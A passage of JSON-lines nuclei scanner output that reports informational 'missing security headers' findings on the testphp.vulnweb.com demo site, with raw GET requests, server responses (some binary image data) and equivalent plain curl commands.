\\ufffd\\ufffd\\ufffdيX\\ufffd\\ufffd\\ufffd\\ufffdWyB\\ufffd\\u003c\\ufffd\\ufffd=\\u001c\\ufffd\\u0019\\ufffd\\ufffdj\\ufffdԒ46dE\\ufffdW\\ufffd#*\\ufffd\\u0002D\\ufffds\\ufffd\\ufffd~\\ufffd\\u001c\\ufffdsE\\u0015\\ufffd\\ufffdb\\ufffd\\ufffd7-\\ufffdI\\ufffd\\\"\\ufffd\\u00126\\ufffd\\ufffdA\\u0006\\ufffd4]\\ufffd\\ufffd]\\u001b\\ufffd\\ufffd5\\ufffd\\u0008cx\\ufffd\\ufffd1\\ufffdъ\\ufffd\\u001c\\ufffdt\\ufffd\\ufffdA\\ufffdS\\ufffd\\ufffd\\ufffdEz\\u003e3\\ufffd\\u000b\\ufffd%|\\ufffd\\ufffd\\ufffdMSF\\ufffd\\ufffd\\ufffd\\n\\ufffdI\\ufffdrG\\ufffd\\ufffd1\\ufffdI\\ufffd:żp\\ufffd\\ufffdl\\u0017r\\ufffd\\u0017\\u0001\\ufffd\\ufffd\\u0002\\ufffd\\u0015\\ufffd\\u001fO\\u0003\\ufffd\\ufffd\\u0001\\ufffd\\u0002\\ufffd(\\ufffdj\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:10.457243575Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testphp.vulnweb.com/admin/\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /admin/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /admin/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"create.sql\\\"\\u003ecreate.sql\\u003c/a\\u003e 11-May-2011 10:27 523\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:10.874450425Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:10.874499376Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:11.080495372Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop\",\"path\":\"/Mod_Rewrite_Shop\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/\",\"request\":\"GET /Mod_Rewrite_Shop HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n\\t\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/1.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003eNetwork Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003ePrice\\u003cbr\\u003e359 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/2.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003eWeb Camera A4Tech PK-335E\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003ePrice\\u003cbr\\u003e10 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/3.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/color-printer/3/'\\u003eLaser Color Printer HP LaserJet M551dn, A4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/color-printer/3/'\\u003ePrice\\u003cbr\\u003e812 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003c/div\\u003e\\r\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:11.080541757Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"path\":\"/cgi-bin/status\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"request\":\"GET /cgi-bin/status HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:11.080555719Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 'http://testphp.vulnweb.com/cgi-bin/status'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:11.833905788Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"path\":\"/Mod_Rewrite_Shop/Details/color-printer/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"request\":\"GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:11.834000835Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:11.834043689Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"path\":\"/pictures/5.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"request\":\"GET /pictures/5.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4428\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:12 GMT\\r\\nEtag: \\\"4dca64a1-114c\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0002\\u0003\\u0005\\u0001\\u0007\\u0006\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0004\\u0006\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0012!1AQ\\u0013\\\"\\u00052aq\\u0006\\u0014#B\\ufffd\\ufffd\\ufffd\\ufffdR\\ufffd\\u0015b\\ufffdr\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0000\\u0001\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000/\\u0011\\u0000\\u0001\\u0003\\u0002\\u0005\\u0001\\u0007\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0011\\u0005\\u0012!1A\\u0013Qaq\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0006\\ufffd\\u00142\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\u001a\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdV\\u0015\\ufffd\\ufffdgQ\\ufffd%XmƲ 